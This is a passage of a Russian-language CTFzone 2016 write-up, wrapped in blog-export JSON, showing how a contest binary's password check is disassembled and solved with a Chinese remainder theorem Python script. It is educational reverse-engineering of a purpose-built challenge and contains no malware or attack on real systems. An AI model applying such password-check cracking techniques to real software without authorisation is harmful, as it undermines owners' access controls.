Doors, the jambs invisible to the eye, and matched so perfectly with the metal bulkhead that when closed the Doors could not be seen.<br \/>  The inscription on the archivolt read:<br \/>  \u00abThe Doors of Dorun, Lord of Omega. Speak, friend, and enter. I, Norvy, made them. Calabrimbor of Alpha Centauri drew these signs\u00bb.<br \/>  But be careful and hurry up. They can be back any moment.<\/p><\/blockquote>\n<p>  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0441\u044f \u0444\u0430\u0439\u043b, \u043f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043f\u043e\u044f\u0432\u043b\u044f\u043b\u043e\u0441\u044c \u043e\u043a\u043d\u043e \u0441 \u043f\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u0432\u0432\u043e\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044f. \u0415\u0441\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043d\u0435\u0432\u0435\u0440\u0435\u043d, \u0442\u043e \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0430:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/8d6\/395\/505\/8d6395505dfb4c669e064d2512b1c042.png\" \/><\/div>\n<p>  \u041d\u0443-\u0441, \u0445\u043e\u0440\u043e\u0448\u043e, \u0432\u044b\u0432\u0435\u0440\u043d\u0435\u043c \u043d\u0430\u0438\u0437\u043d\u0430\u043d\u043a\u0443! \u0414\u0438\u0437\u0430\u0441\u0441\u0435\u043c\u0431\u043b\u0438\u0440\u0443\u0435\u043c \u0438 \u0432\u043d\u043e\u0432\u044c \u0432\u0438\u0434\u0438\u043c, \u0443\u0436\u0435 \u0437\u043d\u0430\u043a\u043e\u043c\u0443\u044e \u043d\u0430\u043c \u0438\u0437 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f (REVERSE50), \u0444\u0443\u043d\u043a\u0446\u0438\u044e: DialogFunc, \u043f\u043e \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044e: 13F7C1040. \u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0430\u043b\u0435\u0435 \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/2ba\/fc6\/cad\/2bafc6cad6bd46f88c172e5917dbc297.png\" \/><\/div>\n<p>  \u041d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u0443\u0447\u0430\u0441\u0442\u043a\u0435 \u043a\u043e\u0434\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f, \u0430 \u0437\u0430\u0442\u0435\u043c \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0435\u0433\u043e \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044e (\u043d\u0430\u0437\u043e\u0432\u0451\u043c \u0435\u0451: PassVerify), \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0432\u0435\u0440\u043d\u043e\u0433\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430:<br \/>  <code>jz short loc_13F7C1126<\/code><br \/>  \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u0438\u0442 \u043d\u0430\u0441 \u043d\u0430 \u0443\u0447\u0430\u0441\u0442\u043e\u043a \u043a\u043e\u0434\u0430, \u0441\u0438\u0433\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/0e9\/0c7\/44a\/0e90c744ae5743dfaa6b43a8128ec9e3.png\" \/><\/div>\n<p>  \u041f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044e: PassVerify \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0447\u0442\u043e \u0436\u0435 \u0442\u0430\u043c \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442.<br \/>  \u0412\u0438\u0434\u0438\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0434\u043b\u0438\u043d\u044b, \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0439 \u043d\u0430\u043c\u0438 \u0444\u0440\u0430\u0437\u044b \u2013 4 \u0441\u0438\u043c\u0432\u043e\u043b\u0430.<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/f29\/cfb\/8c6\/f29cfb8c6d594f63ad56839d8d411d21.png\" \/><\/div>\n<p>  \u0417\u0430\u0442\u0435\u043c, \u043f\u0430\u0440\u043e\u043b\u044c \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 2 \u0447\u0430\u0441\u0442\u0438 \u043f\u043e 2 \u0441\u0438\u043c\u0432\u043e\u043b\u0430:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/113\/5db\/c96\/1135dbc969364659a0c9c78afadd412e.png\" \/><\/div>\n<p>  \u0414\u0430\u043b\u0435\u0435 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0435\u043a\u0430 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u0441\u0432\u0435\u0440\u043a\u0438. \u0418, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0430\u0434\u0440\u0435\u0441\u0430: 13F7C1330, \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/89e\/879\/1e0\/89e8791e0819430fb74c57aa1df84e29.png\" \/><\/div>\n<p>  \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u043c HexRays \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u043a\u043e\u0434:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/374\/597\/67c\/37459767c8fb4f99a134dbf76fbceb05.png\" \/><\/div>\n<p>  \u0418\u0442\u0430\u043a, \u0447\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c? \u0412 \u00abv3\u00bb \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u0435\u0440\u0432\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044f, \u0430 \u0432 \u00abv5\u00bb \u2014 \u0432\u0442\u043e\u0440\u0430\u044f.<br \/>  \u0415\u0441\u043b\u0438 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u0446\u0438\u043a\u043b, \u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0435 \u0443\u0441\u043b\u043e\u0432\u0438\u0435 (Python):<\/p>\n<pre><code class=\"python\">v8 = [0, 0, 1, 241, 995, 0, 1, 4, 6, 104, 413, 0] if (v3%3==v8[0] and v3%5==v8[1] and v3%17==v8[2] and v3%257==v8[3] and v3%65537==v8[4]) or (v5%3==v8[6] and v5%5==v8[7] and v5%17==v8[8] and v5%257==v8[9] and v5%65537==v8[10])<\/code><\/pre>\n<p>  \u0412\u0430\u0440\u0438\u0430\u043d\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044f \u043a\u0430\u0436\u0434\u044b\u0439 \u0432\u044b\u0431\u0438\u0440\u0430\u043b \u0434\u043b\u044f \u0441\u0435\u0431\u044f. \u041e\u0434\u043d\u0430\u043a\u043e, \u043c\u044b \u043d\u0435 \u0438\u0449\u0435\u043c \u043b\u0451\u0433\u043a\u0438\u0445 \u043f\u0443\u0442\u0435\u0439 \u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 \u0442\u0435\u043e\u0440\u0435\u043c\u043e\u0439 \u043e\u0431 \u043e\u0441\u0442\u0430\u0442\u043a\u0430\u0445 (\u0441\u043a\u0440\u0438\u043f\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u0441\u0442\u0430\u043b\u0441\u044f \u0435\u0449\u0451 \u0441 <a href=\"http:\/\/www.neoquest.ru\/timeline.php?year=2016&amp;part=2\">NeoQuest2016<\/a>):<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f \u0442\u0435\u043e\u0440\u0435\u043c\u0430 \u043e\u0431 \u043e\u0441\u0442\u0430\u0442\u043a\u0430\u0445. \u0420\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f: Python<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"python\">def chinese_remainder(n, a):     sum = 0     prod = reduce(lambda a, b: a*b, n)       for n_i, a_i in zip(n, a):         p = prod \/ n_i         sum += a_i * mul_inv(p, n_i) * p     return sum % prod     def mul_inv(a, b):     b0 = b     x0, x1 = 0, 1     if b == 1: return 1     while a &gt; 1:         q = a \/ b         a, b = b, a%b         x0, x1 = x1 - q * x0, x0     if x1 &lt; 0: x1 += b0     return x1 <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c:   <\/p>\n<pre><code class=\"python\">hex(chinese_remainder([3,5,17,257,65537],[v8[0],v8[1],v8[2],v8[3],v8[4]]))<\/code><\/pre>\n<p>\u0412\u044b\u0432\u043e\u0434: 0xa028a40b<\/p>\n<p>  \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c:  <\/p>\n<pre><code class=\"python\">hex(chinese_remainder([3,5,17,257,65537],[v8[6],v8[7],v8[8],v8[9],v8[10]]))<\/code><\/pre>\n<p>\u0412\u044b\u0432\u043e\u0434: 0xa288a425<\/p>\n<p>  \u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043a\u043e\u0434\u044b \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \u0421\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0448\u0430\u0433\u043e\u043c \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0441\u0435\u0449\u0435\u043d\u0438\u0435 <a href=\"http:\/\/unicode-table.com\/ru\">\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430<\/a> \u0438 \u043f\u043e\u0438\u0441\u043a \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 \u043f\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c HEX \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f\u043c. \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c: \ua40b\ua028\ua425\ua288. \u041f\u0440\u043e\u0431\u0443\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c \u2014 Profit!<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/e0d\/146\/a3e\/e0d146a3e46c4fa094196f2c46613efc.png\" \/><\/div>\n<hr\/>\n<p>  \u00a0\u00a0\u041c\u044b \u0431\u0443\u0434\u0435\u043c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u0446\u0438\u043a\u043b \u0441\u0442\u0430\u0442\u0435\u0439, \u0433\u0434\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 CTFzone 2016.<br \/>  \u00a0\u00a0\u041e\u0441\u0442\u0430\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u0441 \u043d\u0430\u043c\u0438!<\/p>\n<hr\/>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habrahabr.ru\/post\/315898\/\"> https:\/\/habrahabr.ru\/post\/315898\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/a25\/45e\/3b0\/a2545e3b056f48a1a133ae12207d5f90.jpg\" align=\"left\"\/><br \/>  <br clear=\"left\"\/>  <\/p>\n<hr\/>\n<p>  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0446\u0438\u043a\u043b \u0441\u0442\u0430\u0442\u0435\u0439, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0439 \u0432\u0440\u0430\u0439\u0442\u0430\u043f\u0443 \u043f\u043e CTFzone, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b 17 \u0438 18 \u043d\u043e\u044f\u0431\u0440\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 ZeroNights2016 \u043f\u043e\u0434 \u0444\u043b\u0430\u0433\u043e\u043c Bi.Zone. \u0412 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043c\u044b \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0438\u043d\u043e\u0441\u0438\u043b\u043e \u043f\u043e 100 \u043e\u0447\u043a\u043e\u0432 \u0432 \u043f\u043e\u043b\u044c\u0437\u0443 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432!  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-281380","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281380"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281380\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}